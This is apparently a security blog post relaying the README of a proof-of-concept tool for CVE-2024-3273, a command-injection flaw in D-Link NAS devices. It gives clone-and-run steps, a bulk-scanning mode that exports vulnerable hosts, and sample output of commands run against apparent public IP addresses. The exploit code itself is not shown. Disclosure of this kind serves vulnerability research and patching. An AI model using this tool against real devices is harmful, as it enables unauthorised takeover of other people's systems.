Cyber security

CVE-2024-3273 Proof Of Concept (PoC) : Unveiling The Vulnerability In D-Link NAS Devices

This repository contains a Proof of Concept (PoC) for CVE-2024-3273, a security vulnerability discovered in D-Link NAS devices.

The vulnerability allows attackers to execute arbitrary commands on vulnerable devices.

CVE-2024-3273 is a vulnerability in D-Link NAS devices that allows remote attackers to execute arbitrary commands via a crafted HTTP request to the cgi-bin/nas_sharing.cgi endpoint.

This PoC demonstrates how the vulnerability can be exploited to execute commands on vulnerable D-Link NAS devices.

Requirements

  • Python 3.x
  • requests library

Usage

  1. Clone this repository:
git clone https://github.com/adhikara13/CVE-2024-3273.git

2. Navigate to the repository directory:

cd CVE-2024-3273

3. Run the PoC:

python main.py

4. Follow the on-screen instructions to choose the target device:

  • Option 1: Single Host (1): Enter details for a single target device, including the host IP address and command to run.
  • Option 2: Multiple Hosts (2): Provide a file containing multiple target devices in the format host:port, and choose whether to export vulnerable hosts to vulnerables.txt.

    Example

    ┏┓┓┏┏┓  ┏┓┏┓┏┓┏┓  ┏┓┏┓━┓┏┓
    ┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
    ┗┛┗┛┗┛  ┗━┗┛┗━┗╋  ┗┛┗━ ╹┗┛
    
    Choose an option (1: Single Host, 2: Multiple Hosts): 1
    Enter the host: 114.32.179.200
    Enter the command to run: ls
    Response from 114.32.179.200:
    box.cgi
    codepage_mgr.cgi
    download_mgr.cgi
    dropbox.cgi
    folder_tree.cgi
    
    ┏┓┓┏┏┓  ┏┓┏┓┏┓┏┓  ┏┓┏┓━┓┏┓
    ┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
    ┗┛┗┛┗┛  ┗━┗┛┗━┗╋  ┗┛┗━ ╹┗┛
    
    Choose an option (1: Single Host, 2: Multiple Hosts): 2
    Enter the file path containing hosts: list.txt
    Export vulnerable host to vulnerables.txt? (y/n): y
    Connection error for host 87.205.188.21:9290.
    Connection error for host 186.212.112.141:8081.
    Host 124.120.263.149:8032 is vulnerable.

    Varshini

    Varshini is a Cyber Security expert in Threat Analysis, Vulnerability Assessment, and Research. Passionate about staying ahead of emerging Threats and Technologies.

    Recent Posts

    Starship : Revolutionizing Terminal Experiences Across Shells

    Starship is a powerful, minimal, and highly customizable cross-shell prompt designed to enhance the terminal…

    13 hours ago

    Lemmy : A Decentralized Link Aggregator And Forum For The Fediverse

    Lemmy is an innovative, open-source platform designed for link aggregation and discussion, providing a decentralized…

    13 hours ago

    Massive UX Improvements, Custom Disassemblers, And MSVC Support In ImHex v1.37.0

    The latest release of ImHex v1.37.0 introduces a host of exciting features and improvements, enhancing…

    15 hours ago

    Ghauri : A Powerful SQL Injection Detection And Exploitation Tool

    Ghauri is a cutting-edge, cross-platform tool designed to automate the detection and exploitation of SQL…

    18 hours ago

    Writing Tools : Revolutionizing The Art Of Writing

    Writing tools have become indispensable for individuals looking to enhance their writing efficiency, accuracy, and…

    18 hours ago

    PatchWerk : A Tool For Cleaning NTDLL Syscall Stubs

    PatchWerk is a proof-of-concept (PoC) tool designed to clean NTDLL syscall stubs by patching syscall…

    2 days ago